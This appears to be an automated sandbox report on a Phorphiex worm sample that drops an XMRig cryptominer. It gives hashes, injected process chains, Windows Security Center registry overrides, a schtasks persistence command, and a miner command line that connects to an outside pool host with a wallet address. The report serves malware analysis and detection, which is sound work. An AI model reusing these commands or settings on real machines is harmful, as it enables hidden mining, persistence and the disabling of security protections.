Malware Analysis Report

2024-11-13 15:39

Sample ID 220812-tcxyxahdc8
Target c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d
SHA256 c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d
Tags
phorphiex xmrig evasion loader miner persistence trojan worm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d

Threat Level: Known bad

The file c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d was found to be: Known bad.

Malicious Activity Summary

phorphiex xmrig evasion loader miner persistence trojan worm

Phorphiex family

xmrig

Windows security bypass

Phorphiex

XMRig Miner payload

Executes dropped EXE

Downloads MZ/PE file

Windows security modification

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in Windows directory

Suspicious use of WriteProcessMemory

Suspicious behavior: LoadsDriver

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-08-12 15:55

Signatures

Phorphiex family

phorphiex

Analysis: behavioral1

Detonation Overview

Submitted

2022-08-12 15:55

Reported

2022-08-12 15:57

Platform

win10-20220722-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe"

Signatures

Phorphiex

worm trojan loader phorphiex

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" C:\Windows\wcdsemgr.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" C:\Windows\wcdsemgr.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" C:\Windows\wcdsemgr.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" C:\Windows\wklopsvcs.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" C:\Windows\wklopsvcs.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" C:\Windows\wklopsvcs.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" C:\Windows\wcdsemgr.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" C:\Windows\wcdsemgr.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" C:\Windows\wcdsemgr.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" C:\Windows\wklopsvcs.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" C:\Windows\wklopsvcs.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" C:\Windows\wklopsvcs.exe N/A

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" C:\Windows\wklopsvcs.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" C:\Windows\wklopsvcs.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" C:\Windows\wklopsvcs.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" C:\Windows\wklopsvcs.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" C:\Windows\wklopsvcs.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" C:\Windows\wklopsvcs.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" C:\Windows\wcdsemgr.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" C:\Windows\wklopsvcs.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" C:\Windows\wcdsemgr.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" C:\Windows\wcdsemgr.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" C:\Windows\wcdsemgr.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" C:\Windows\wcdsemgr.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" C:\Windows\wcdsemgr.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" C:\Windows\wcdsemgr.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\wklopsvcs.exe" C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\wcdsemgr.exe" C:\Users\Admin\AppData\Local\Temp\516319480.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 220 set thread context of 3608 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\wklopsvcs.exe C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe N/A
File opened for modification C:\Windows\wklopsvcs.exe C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe N/A
File created C:\Windows\wcdsemgr.exe C:\Users\Admin\AppData\Local\Temp\516319480.exe N/A
File opened for modification C:\Windows\wcdsemgr.exe C:\Users\Admin\AppData\Local\Temp\516319480.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\svchost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4956 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe C:\Windows\wklopsvcs.exe
PID 4956 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe C:\Windows\wklopsvcs.exe
PID 4956 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe C:\Windows\wklopsvcs.exe
PID 1868 wrote to memory of 3416 N/A C:\Windows\wklopsvcs.exe C:\Users\Admin\AppData\Local\Temp\612732430.exe
PID 1868 wrote to memory of 3416 N/A C:\Windows\wklopsvcs.exe C:\Users\Admin\AppData\Local\Temp\612732430.exe
PID 1868 wrote to memory of 3416 N/A C:\Windows\wklopsvcs.exe C:\Users\Admin\AppData\Local\Temp\612732430.exe
PID 1868 wrote to memory of 3148 N/A C:\Windows\wklopsvcs.exe C:\Users\Admin\AppData\Local\Temp\1740120124.exe
PID 1868 wrote to memory of 3148 N/A C:\Windows\wklopsvcs.exe C:\Users\Admin\AppData\Local\Temp\1740120124.exe
PID 1868 wrote to memory of 3148 N/A C:\Windows\wklopsvcs.exe C:\Users\Admin\AppData\Local\Temp\1740120124.exe
PID 1868 wrote to memory of 4476 N/A C:\Windows\wklopsvcs.exe C:\Users\Admin\AppData\Local\Temp\516319480.exe
PID 1868 wrote to memory of 4476 N/A C:\Windows\wklopsvcs.exe C:\Users\Admin\AppData\Local\Temp\516319480.exe
PID 1868 wrote to memory of 4476 N/A C:\Windows\wklopsvcs.exe C:\Users\Admin\AppData\Local\Temp\516319480.exe
PID 4476 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\516319480.exe C:\Windows\wcdsemgr.exe
PID 4476 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\516319480.exe C:\Windows\wcdsemgr.exe
PID 4476 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\516319480.exe C:\Windows\wcdsemgr.exe
PID 2016 wrote to memory of 4912 N/A C:\Windows\wcdsemgr.exe C:\Users\Admin\AppData\Local\Temp\1533620072.exe
PID 2016 wrote to memory of 4912 N/A C:\Windows\wcdsemgr.exe C:\Users\Admin\AppData\Local\Temp\1533620072.exe
PID 2016 wrote to memory of 4912 N/A C:\Windows\wcdsemgr.exe C:\Users\Admin\AppData\Local\Temp\1533620072.exe
PID 2016 wrote to memory of 2480 N/A C:\Windows\wcdsemgr.exe C:\Users\Admin\AppData\Local\Temp\47587152.exe
PID 2016 wrote to memory of 2480 N/A C:\Windows\wcdsemgr.exe C:\Users\Admin\AppData\Local\Temp\47587152.exe
PID 2016 wrote to memory of 2480 N/A C:\Windows\wcdsemgr.exe C:\Users\Admin\AppData\Local\Temp\47587152.exe
PID 3148 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\1740120124.exe C:\Users\Admin\AppData\Local\Temp\2314210268.exe
PID 3148 wrote to memory of 1908 N/A C:\Users\Admin\AppData\Local\Temp\1740120124.exe C:\Users\Admin\AppData\Local\Temp\2314210268.exe
PID 1908 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\2314210268.exe C:\Windows\System32\conhost.exe
PID 1908 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\2314210268.exe C:\Windows\System32\conhost.exe
PID 1908 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\2314210268.exe C:\Windows\System32\conhost.exe
PID 4644 wrote to memory of 4812 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 4644 wrote to memory of 4812 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 4812 wrote to memory of 1784 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4812 wrote to memory of 1784 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4644 wrote to memory of 4216 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 4644 wrote to memory of 4216 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 4216 wrote to memory of 224 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\wincsvns.exe
PID 4216 wrote to memory of 224 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\wincsvns.exe
PID 224 wrote to memory of 220 N/A C:\Users\Admin\wincsvns.exe C:\Windows\System32\conhost.exe
PID 224 wrote to memory of 220 N/A C:\Users\Admin\wincsvns.exe C:\Windows\System32\conhost.exe
PID 224 wrote to memory of 220 N/A C:\Users\Admin\wincsvns.exe C:\Windows\System32\conhost.exe
PID 220 wrote to memory of 4076 N/A C:\Windows\System32\conhost.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 220 wrote to memory of 4076 N/A C:\Windows\System32\conhost.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 220 wrote to memory of 3608 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 220 wrote to memory of 3608 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 220 wrote to memory of 3608 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 220 wrote to memory of 3608 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 220 wrote to memory of 3608 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 220 wrote to memory of 3608 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 220 wrote to memory of 3608 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 220 wrote to memory of 3608 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 220 wrote to memory of 3608 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 220 wrote to memory of 3608 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 220 wrote to memory of 3608 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 220 wrote to memory of 3608 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 220 wrote to memory of 3608 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 220 wrote to memory of 3608 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 220 wrote to memory of 3608 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 4076 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe C:\Windows\System32\conhost.exe
PID 4076 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe C:\Windows\System32\conhost.exe
PID 4076 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe C:\Windows\System32\conhost.exe

Processes

C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe

"C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe"

C:\Windows\wklopsvcs.exe

C:\Windows\wklopsvcs.exe

C:\Users\Admin\AppData\Local\Temp\612732430.exe

C:\Users\Admin\AppData\Local\Temp\612732430.exe

C:\Users\Admin\AppData\Local\Temp\1740120124.exe

C:\Users\Admin\AppData\Local\Temp\1740120124.exe

C:\Users\Admin\AppData\Local\Temp\516319480.exe

C:\Users\Admin\AppData\Local\Temp\516319480.exe

C:\Windows\wcdsemgr.exe

C:\Windows\wcdsemgr.exe

C:\Users\Admin\AppData\Local\Temp\1533620072.exe

C:\Users\Admin\AppData\Local\Temp\1533620072.exe

C:\Users\Admin\AppData\Local\Temp\47587152.exe

C:\Users\Admin\AppData\Local\Temp\47587152.exe

C:\Users\Admin\AppData\Local\Temp\2314210268.exe

C:\Users\Admin\AppData\Local\Temp\2314210268.exe

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\2314210268.exe"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "wincsvns" /tr "C:\Users\Admin\wincsvns.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "wincsvns" /tr "C:\Users\Admin\wincsvns.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\wincsvns.exe"

C:\Users\Admin\wincsvns.exe

C:\Users\Admin\wincsvns.exe

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\wincsvns.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\System32\svchost.exe

C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=185.215.113.84:8586 --user=43RrFTp7myuC9LHNDXFDm2H49Qfp5iMfbLjcbVEmKv5qdoP5vqJyKnrHixqv2QPEtW2jBjeAXzBgtjbzkNNg47Zw1DH2D2H --pass=x --cpu-max-threads-hint=40 --cinit-idle-wait=10 --cinit-idle-cpu=80

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost64"

Network

Country Destination Domain Proto
FR 51.11.192.48:443 tcp
US 13.107.4.50:80 tcp
RU 185.215.113.84:80 185.215.113.84 tcp
RU 185.215.113.84:80 185.215.113.84 tcp
US 8.8.8.8:53 www.update.microsoft.com udp
US 20.109.209.108:80 www.update.microsoft.com tcp
RU 185.215.113.84:80 185.215.113.84 tcp
N/A 10.231.50.30:40500 udp
IR 37.255.124.89:40500 tcp
UZ 62.209.132.199:40500 udp
EG 154.237.114.27:40500 udp
UZ 80.80.222.89:40500 udp
MX 187.200.76.99:40500 udp
SY 82.137.244.49:40500 udp
RU 95.163.189.237:40500 tcp
GE 178.236.57.16:40500 udp
RU 185.215.113.84:80 185.215.113.84 tcp
US 8.8.8.8:53 www.update.microsoft.com udp
US 20.109.209.108:80 www.update.microsoft.com tcp
IR 37.255.195.231:40500 udp
IN 45.248.160.159:40500 tcp
IN 117.206.43.166:40500 udp
PK 39.53.176.26:40500 udp
IR 151.234.138.54:40500 udp
AZ 91.242.14.27:40500 udp
IR 31.56.142.196:40500 udp
IR 87.107.151.80:40500 tcp
RU 185.215.113.84:80 185.215.113.84 tcp
DZ 41.96.28.194:40500 udp
US 69.67.151.23:40500 udp
UZ 213.230.71.54:40500 udp
RU 2.61.9.253:40500 udp
IN 117.201.169.74:40500 udp
AO 154.65.244.161:40500 tcp
YE 178.130.94.154:40500 udp
RU 185.215.113.84:8586 tcp

Files

memory/4956-127-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-128-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-129-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-130-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-131-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-132-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-133-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-134-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-135-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-136-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-137-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-138-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-139-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-140-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-141-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-142-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-143-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-144-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-145-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-146-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-147-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-148-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-149-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-150-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-151-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-152-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-154-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-153-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-155-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-156-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-157-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-158-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-159-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-160-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-161-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-162-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-163-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/4956-164-0x0000000077E40000-0x0000000077FCE000-memory.dmp

C:\Windows\wklopsvcs.exe

MD5 209baf40779b80d5e443c3dbbd656bfb
SHA1 b64fa8dded031d5dacac519a2035cefcd05e6503
SHA256 c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d
SHA512 9b4e3e82e141e569c85f22dd215f804b2f4e8969cda858662efca67532ba57d2e0acdbaa179524b4996be62f9acee3298eaf6cdfd03eff7e39e23bc7163c440e

memory/1868-165-0x0000000000000000-mapping.dmp

memory/1868-167-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/1868-168-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/1868-169-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/1868-170-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/1868-171-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/1868-172-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/1868-173-0x0000000077E40000-0x0000000077FCE000-memory.dmp

C:\Windows\wklopsvcs.exe

MD5 209baf40779b80d5e443c3dbbd656bfb
SHA1 b64fa8dded031d5dacac519a2035cefcd05e6503
SHA256 c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d
SHA512 9b4e3e82e141e569c85f22dd215f804b2f4e8969cda858662efca67532ba57d2e0acdbaa179524b4996be62f9acee3298eaf6cdfd03eff7e39e23bc7163c440e

memory/1868-175-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/1868-176-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/1868-177-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/1868-178-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/1868-179-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/1868-180-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/1868-181-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/1868-182-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/1868-183-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/1868-184-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/1868-185-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/1868-186-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/1868-187-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/1868-188-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/1868-189-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/1868-190-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/1868-191-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/1868-193-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/1868-192-0x0000000077E40000-0x0000000077FCE000-memory.dmp

memory/3416-215-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\612732430.exe

MD5 c8a69840ffff790ea975bb0cf55f7f4d
SHA1 dd1c74f0eb2fc813d16c96669e22fb657b67c4b3
SHA256 e532a8c62dbf01fecc09896f376e689ee836c5498ff24586ed142f72cfd174dc
SHA512 df22b912e15640cd1c5f91908e1e2d2b4fc7be27d54415fd2c0ba5f0de83a785662b67912e4513e13fde30abab4082763d4dd6e65ddc2cdfe47bbe6ee40d249a

C:\Users\Admin\AppData\Local\Temp\612732430.exe

MD5 c8a69840ffff790ea975bb0cf55f7f4d
SHA1 dd1c74f0eb2fc813d16c96669e22fb657b67c4b3
SHA256 e532a8c62dbf01fecc09896f376e689ee836c5498ff24586ed142f72cfd174dc
SHA512 df22b912e15640cd1c5f91908e1e2d2b4fc7be27d54415fd2c0ba5f0de83a785662b67912e4513e13fde30abab4082763d4dd6e65ddc2cdfe47bbe6ee40d249a

memory/3148-255-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\1740120124.exe

MD5 a475e43527d7dc7d6f2d23bad64fcc99
SHA1 793a7625c0106d6cd79d060b4eec94e58530833e
SHA256 f97c43bf3dce6180e658f2c3776e31cf52472b28ac8249be4d307880b6405eeb
SHA512 4af57a218d7d790b5ec4581dd2bc941deff05ea11bf6054a9d268c054af421977cdd68d5090884358208925f50023c97e9cfaba0831d72e9bcdcca729447d900

C:\Users\Admin\AppData\Local\Temp\1740120124.exe

MD5 a475e43527d7dc7d6f2d23bad64fcc99
SHA1 793a7625c0106d6cd79d060b4eec94e58530833e
SHA256 f97c43bf3dce6180e658f2c3776e31cf52472b28ac8249be4d307880b6405eeb
SHA512 4af57a218d7d790b5ec4581dd2bc941deff05ea11bf6054a9d268c054af421977cdd68d5090884358208925f50023c97e9cfaba0831d72e9bcdcca729447d900

memory/4476-292-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\516319480.exe

MD5 5741eadfc89a1352c61f1ff0a5c01c06
SHA1 cdff6ddd67f17385f283a0f9e8de76731f11a9b6
SHA256 ea500d77aabc3c9d440480002c3f1d2f2977a7f860f35260edda8a26406ca1c3
SHA512 08104893c726e06c6fe7687394d084365b72cf19e821be0d7a1b094c9a0d54ccea65fd01ea33a1f507680d21c6f98e62e2d765b4a0ce3b3d8d458063bd375063

C:\Users\Admin\AppData\Local\Temp\516319480.exe

MD5 5741eadfc89a1352c61f1ff0a5c01c06
SHA1 cdff6ddd67f17385f283a0f9e8de76731f11a9b6
SHA256 ea500d77aabc3c9d440480002c3f1d2f2977a7f860f35260edda8a26406ca1c3
SHA512 08104893c726e06c6fe7687394d084365b72cf19e821be0d7a1b094c9a0d54ccea65fd01ea33a1f507680d21c6f98e62e2d765b4a0ce3b3d8d458063bd375063

memory/2016-333-0x0000000000000000-mapping.dmp

C:\Windows\wcdsemgr.exe

MD5 5741eadfc89a1352c61f1ff0a5c01c06
SHA1 cdff6ddd67f17385f283a0f9e8de76731f11a9b6
SHA256 ea500d77aabc3c9d440480002c3f1d2f2977a7f860f35260edda8a26406ca1c3
SHA512 08104893c726e06c6fe7687394d084365b72cf19e821be0d7a1b094c9a0d54ccea65fd01ea33a1f507680d21c6f98e62e2d765b4a0ce3b3d8d458063bd375063

C:\Windows\wcdsemgr.exe

MD5 5741eadfc89a1352c61f1ff0a5c01c06
SHA1 cdff6ddd67f17385f283a0f9e8de76731f11a9b6
SHA256 ea500d77aabc3c9d440480002c3f1d2f2977a7f860f35260edda8a26406ca1c3
SHA512 08104893c726e06c6fe7687394d084365b72cf19e821be0d7a1b094c9a0d54ccea65fd01ea33a1f507680d21c6f98e62e2d765b4a0ce3b3d8d458063bd375063

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\WLUPZK3F\2[1]

MD5 573584190b9ae1f05e0b40591df933c4
SHA1 412fe72d4eb447ac1744bea4a35360703b1fb110
SHA256 85348184c11fe6ea7866ab07f01a7acdd189b0c349b2775f1d28f188b45fa074
SHA512 cc33f657047478259fb4ff1d610b9e8adf55744aa4a0a015413cf2747b11992c4d2d5df9d449690c1d28d905e92e93f2b915edf51e8361973018b17bfad496d4

memory/4912-384-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\1533620072.exe

MD5 c8a69840ffff790ea975bb0cf55f7f4d
SHA1 dd1c74f0eb2fc813d16c96669e22fb657b67c4b3
SHA256 e532a8c62dbf01fecc09896f376e689ee836c5498ff24586ed142f72cfd174dc
SHA512 df22b912e15640cd1c5f91908e1e2d2b4fc7be27d54415fd2c0ba5f0de83a785662b67912e4513e13fde30abab4082763d4dd6e65ddc2cdfe47bbe6ee40d249a

